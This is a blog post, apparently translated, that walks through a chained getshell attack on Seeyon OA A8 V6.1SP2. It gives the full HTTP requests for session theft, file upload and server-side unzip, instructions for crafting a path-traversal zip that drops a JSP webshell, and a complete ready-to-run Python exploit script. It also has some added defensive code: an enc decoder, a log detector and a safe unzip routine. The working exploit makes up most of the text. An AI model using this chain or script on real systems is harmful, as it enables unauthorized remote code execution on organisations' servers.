Seeyon (致遠) OA: chained getshell


Tested version: Seeyon A8-V5 Collaborative Management Software V6.1SP2

Test environment: built locally.

Getshell takes three steps:

1. Obtain a session cookie
2. Upload the zip archive
3. Have the server unzip the archive, which drops the shell

1. Obtain the cookie

Vulnerable endpoint

/seeyon/thirdpartyController.do 

Request:

POST /seeyon/thirdpartyController.do HTTP/1.1
Host: 192.168.1.88:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 133

method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1

The response sets a JSESSIONID cookie; that is the session used in the next two steps.
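It is worth seeing what that enc blob actually says. The block below is an added example, not code from the original post: the value is URL-encoded base64 of a plaintext in which every character has been shifted up by one, so decoding is base64 followed by subtracting 1 from each byte. The post does not explain the decoded fields; reading L as the requested action, M as an account id and T as a timestamp is my assumption, and the function names are mine.

```python
import base64
from urllib.parse import quote, unquote

# The enc value copied verbatim from the request above (URL-encoded, %2B == '+').
ENC_FROM_REQUEST = ("TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMx"
                    "MjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4")


def decode_enc(enc):
    """Undo the obfuscation: URL-decode, base64-decode, then subtract 1 from
    every byte (the encoder added 1 to each character before base64)."""
    raw = base64.b64decode(unquote(enc))
    return bytes(b - 1 for b in raw).decode("ascii")


def encode_enc(plain):
    """Inverse of decode_enc: add 1 to every byte, base64, URL-encode."""
    shifted = bytes(b + 1 for b in plain.encode("ascii"))
    return quote(base64.b64encode(shifted).decode("ascii"), safe="")


def parse_fields(plain):
    """Split the decoded 'L=...&M=...&T=...' string into a dict.
    Meaning of L/M/T is an assumption (action, account id, timestamp)."""
    return dict(part.split("=", 1) for part in plain.split("&"))
```

decode_enc(ENC_FROM_REQUEST) gives `L=message.link.doc.folder.open&M=-7273032013234748168&T=2583618396147`. There is no key or signature involved, only obfuscation, which is consistent with the script at the end of the post replaying the identical enc value against any host. A quick check on your own instance: if thirdpartyController.do still answers this exact request with a Set-Cookie, the fix is not in place.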

2. Upload the zip archive

Vulnerable endpoint:

/seeyon/fileUpload.do?method=processUpload&maxSize=

Request:

POST /seeyon/fileUpload.do?method=processUpload&maxSize= HTTP/1.1
Host: 192.168.1.88:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.88:8080/seeyon/fileUpload.do?method=processUpload&maxSize=
Cookie: JSESSIONID=A4D1CCA965228F523B70833968568BE6
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------1416682316313
Content-Length: 1179

-----------------------------1416682316313
Content-Disposition: form-data; name="type"


-----------------------------1416682316313
Content-Disposition: form-data; name="extensions"


-----------------------------1416682316313
Content-Disposition: form-data; name="applicationCategory"


-----------------------------1416682316313
Content-Disposition: form-data; name="destDirectory"


-----------------------------1416682316313
Content-Disposition: form-data; name="destFilename"


-----------------------------1416682316313
Content-Disposition: form-data; name="maxSize"


-----------------------------1416682316313
Content-Disposition: form-data; name="isEncrypt"


-----------------------------1416682316313
Content-Disposition: form-data; name="file1"; filename="123.zip"
Content-Type: application/x-zip-compressed

<raw bytes of the zip file>
-----------------------------1416682316313--

Swap the cookie and host in the upload request above for your own and send it; the response contains a fileurls value, which is the file id used in the next step.

3. Unzip the archive to get the shell

Vulnerable endpoint

/seeyon/ajax.do

Request:

POST /seeyon/ajax.do HTTP/1.1
Host: 192.168.1.88:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=A4D1CCA965228F523B70833968568BE6
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 142

method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment&arguments=[0,"2021-04-10","2708692024033719158"]


Verification

Request one of the files from the archive to confirm. After extraction the files are located at

/seeyon/common/designer/pageLayout/<file name inside the archive>

Getshell succeeded.
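On the defence side, the chain leaves a recognisable trail in the web server access log even though the telling POST parameters (method=access, managerMethod=uploadPageLayoutAttachment) travel in request bodies and never reach it. The block below is an added example, not part of the original post: it parses a few constructed combined-format log lines and looks, per source IP, for the four requests of the chain in order inside a time window, plus a standalone rule for any .jsp fetched from /seeyon/common/designer/pageLayout/, the path the shell is fetched from in the post. The log lines, addresses and names are made up.

```python
import re
from datetime import datetime, timedelta

# Constructed sample access log (combined format); not taken from the post.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Apr/2021:14:02:01 +0800] "POST /seeyon/thirdpartyController.do HTTP/1.1" 200 1532
192.0.2.10 - - [10/Apr/2021:14:02:05 +0800] "POST /seeyon/fileUpload.do?method=processUpload&maxSize= HTTP/1.1" 200 811
192.0.2.10 - - [10/Apr/2021:14:02:09 +0800] "POST /seeyon/ajax.do HTTP/1.1" 200 12
192.0.2.10 - - [10/Apr/2021:14:02:11 +0800] "GET /seeyon/common/designer/pageLayout/aB3kD9xZ.jsp HTTP/1.1" 200 45
198.51.100.7 - - [10/Apr/2021:14:03:00 +0800] "GET /seeyon/main.do HTTP/1.1" 200 9000
198.51.100.7 - - [10/Apr/2021:14:03:30 +0800] "POST /seeyon/ajax.do HTTP/1.1" 200 300
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The four requests of the chain, in order: (method, predicate on path+query).
STAGES = [
    ("POST", lambda p: p.startswith("/seeyon/thirdpartyController.do")),
    ("POST", lambda p: p.startswith("/seeyon/fileUpload.do") and "method=processUpload" in p),
    ("POST", lambda p: p.startswith("/seeyon/ajax.do")),
    ("GET", lambda p: p.startswith("/seeyon/common/designer/pageLayout/")
                      and p.lower().endswith(".jsp")),
]


def parse_log(text):
    """Turn combined-format lines into dicts; lines that do not parse are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append({"ip": m["ip"], "ts": ts, "method": m["method"],
                       "path": m["path"], "status": int(m["status"])})
    return events


def find_chains(text, window=timedelta(minutes=10)):
    """Per source IP, match the four stages in order within `window` of the first."""
    per_ip = {}
    for ev in sorted(parse_log(text), key=lambda e: e["ts"]):
        per_ip.setdefault(ev["ip"], []).append(ev)
    hits = []
    for ip, events in per_ip.items():
        stage, start = 0, None
        for ev in events:
            if start is not None and ev["ts"] - start > window:
                stage, start = 0, None  # chain timed out, start over
            method, pred = STAGES[stage]
            if ev["method"] == method and pred(ev["path"]):
                if stage == 0:
                    start = ev["ts"]
                stage += 1
                if stage == len(STAGES):
                    hits.append({"ip": ip, "start": start, "shell": ev["path"]})
                    stage, start = 0, None
    return hits


def flag_jsp_in_pagelayout(text):
    """Standalone rule: a .jsp served from pageLayout is suspicious on its own."""
    _, pred = STAGES[3]
    return [ev["path"] for ev in parse_log(text) if pred(ev["path"])]
```

ajax.do is a generic dispatcher (any managerName/managerMethod goes through it), so on its own it is noise; the rule keys on the order and on the final .jsp fetch. If a reverse proxy or WAF logs request bodies, matching managerMethod=uploadPageLayoutAttachment together with a processUpload whose file is not really an image makes the middle stages far more specific.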

Note: making the zip file

Create two files:

layout.xml: must be present, otherwise the server-side unzip step fails; empty content is fine
12345678.txt: any name and content; to drop a webshell, put the shell code in it and give it a .jsp extension

Zip them up.

Open the zip in a hex/text editor and overwrite the first three characters of the shell's file name with ..\ . The name must keep exactly the same length before and after the edit, otherwise the archive is corrupted: the zip format records the name length in both the local file header and the central directory, so changing it breaks the offsets. The script at the end of the post writes the name as ../ instead; the backslash form only traverses on a Windows server, the forward slash works on both Windows and Linux.

Save and inspect the result.
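The note above builds the traversal archive by hand in a hex editor. The block below is an added example (my code, not the post's): it builds the same archive in memory with Python's zipfile, which stores the entry name verbatim so no byte patching is needed, and then runs it through two extractors, a naive one that joins the entry name onto the destination (the behaviour the unzip step relies on) and a hardened one that resolves every entry first and refuses the archive if any entry would land outside the destination. The destination is a scratch directory because the post does not say which directory the server unzips into; function names are mine.

```python
import io
import os
import tempfile
import zipfile


def build_traversal_zip(shell_name, shell_body, sep="/", depth=1):
    """Build the archive from the note in memory: an empty layout.xml plus a
    shell whose stored name is prefixed with '../' (or '..\\' for sep='\\').
    zipfile stores the name as given, so no hex editing is required."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("layout.xml", b"")
        zf.writestr((".." + sep) * depth + shell_name, shell_body)
    return buf.getvalue()


def list_names(zip_bytes):
    """Entry names exactly as stored in the central directory."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.namelist()


def unsafe_extract(zip_bytes, dest):
    """Vulnerable extractor: dest + entry name with no normalisation check,
    i.e. new File(dest, entryName) style. Returns the real path of each file."""
    written = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(target))
    return written


def safe_extract(zip_bytes, dest):
    """Hardened extractor: resolve every entry before writing anything and
    reject the whole archive if one would land outside dest."""
    root = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        plan = []
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(root, info.filename))
            if os.path.commonpath([root, target]) != root:
                raise ValueError("zip slip entry rejected: %r" % info.filename)
            plan.append((info, target))
        for info, target in plan:
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
    return [t for _, t in plan]


def escaped(paths, dest):
    """Subset of real paths that resolve outside dest."""
    root = os.path.realpath(dest)
    return [p for p in paths if os.path.commonpath([root, p]) != root]


def demo(sep="/"):
    """Run both extractors on one archive inside a scratch tree and report."""
    z = build_traversal_zip("shell.jsp", b"<%-- placeholder, not a real shell --%>", sep=sep)
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "extract_target")
        os.makedirs(dest)
        out = escaped(unsafe_extract(z, dest), dest)
        rel = [os.path.relpath(p, os.path.realpath(tmp)) for p in out]
        try:
            safe_extract(z, dest)
            rejected = None
        except ValueError as exc:
            rejected = str(exc)
    return {"names": list_names(z), "escaped": rel, "rejected": rejected}
```

Python's own ZipFile.extract() strips leading ../ components, which is why exploit scripts write the archive with writestr but could not reproduce the bug with the stock extraction API; the naive extractor above mimics an extractor that does no such check. Try demo(sep="\\") on a Linux box: the name ..\shell.jsp is then just an odd file name and stays inside the destination, which is the point of the caveat about backslashes above.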

Anyway, this works:

# coding:utf-8
import time
import requests
import re
import sys
import random
import zipfile


la = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0',
      'Content-Type': 'application/x-www-form-urlencoded'}


def generate_random_str(randomlength=16):
    # random alphanumeric name, used for both the zip and the shell
    random_str = ''
    base_str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
    length = len(base_str) - 1
    for i in range(randomlength):
        random_str += base_str[random.randint(0, length)]
    return random_str


mm = generate_random_str(8)

webshell_name1 = mm + '.jsp'
webshell_name2 = '../' + webshell_name1  # traversal entry name inside the zip


def file_zip():
    shell = 'test'  # replace with the shell content
    # layout.xml must exist or the server-side unzip fails; empty is fine
    with zipfile.ZipFile(mm + '.zip', mode='w', compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr('layout.xml', "")
        zf.writestr(webshell_name2, shell)


def Seeyon_Getshell(urllist):
    # step 1: get a session from thirdpartyController.do (same enc value as the request above)
    url = urllist + '/seeyon/thirdpartyController.do'
    post = "method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04+LjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1"
    response = requests.post(url=url, data=post, headers=la)
    if not (response and response.status_code == 200 and 'set-cookie' in str(response.headers).lower()):
        print('Failed to get cookie')
        sys.exit(1)
    cookies = requests.utils.dict_from_cookiejar(response.cookies)
    jsessionid = cookies['JSESSIONID']
    print('Got cookie ---->> ' + jsessionid)

    # step 2: upload the zip (declared as a PNG) via fileUpload.do
    file_zip()
    fileurl = urllist + '/seeyon/fileUpload.do?method=processUpload&maxSize='
    headersfile = {'Cookie': "JSESSIONID=%s" % jsessionid}
    post = {'callMethod': 'resizeLayout', 'firstSave': "true", 'takeOver': "false", "type": '0',
            'isEncrypt': "0"}
    with open(mm + '.zip', 'rb') as fh:
        file = [('file1', ('test.png', fh, 'image/png'))]
        filego = requests.post(url=fileurl, data=post, files=file, headers=headersfile)
    time.sleep(2)

    # the response embeds the file id as fileurls=fileurls+","+'<id>'
    fileid1 = re.findall(r'fileurls=fileurls\+","\+\'(.+)\'', filego.text, re.I)
    if len(fileid1) == 0:
        print('No file id returned, the upload probably failed!')
        sys.exit(1)
    fileid = fileid1[0]
    print('Upload OK, file id ---->>: ' + fileid)

    # step 3: have portalDesignerManager unzip the upload into pageLayout
    Date_time = time.strftime('%Y-%m-%d')
    headersfile2 = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': "JSESSIONID=%s" % jsessionid}
    getshellurl = urllist + '/seeyon/ajax.do'
    data = ('method=ajaxAction&managerName=portalDesignerManager&managerMethod=uploadPageLayoutAttachment'
            '&arguments=%5B0%2C%22' + Date_time + '%22%2C%22' + fileid + '%22%5D')
    requests.post(url=getshellurl, data=data, headers=headersfile2)
    time.sleep(1)

    # verify by requesting the shell from pageLayout
    webshellurl1 = urllist + '/seeyon/common/designer/pageLayout/' + webshell_name1
    shelllist = requests.get(url=webshellurl1)
    if shelllist.status_code == 200:
        print('Exploit succeeded, webshell at: ' + webshellurl1)
    else:
        print('Webshell not found, exploit failed')


def main():
    if len(sys.argv) == 2:
        url = sys.argv[1]
        Seeyon_Getshell(url)
    else:
        print("python3 Seeyon_Getshell.py http://xx.xx.xx.xx")


if __name__ == '__main__':
    main()
Author: Li qun
Link: https://www.ailiqun.xyz/2021/04/10/%E8%87%B4%E8%BF%9COA-%E7%BB%84%E5%90%88getshell/
License: unless otherwise stated, all posts on this blog are released under CC BY-NC-SA 4.0. Please credit Liqun when reposting.

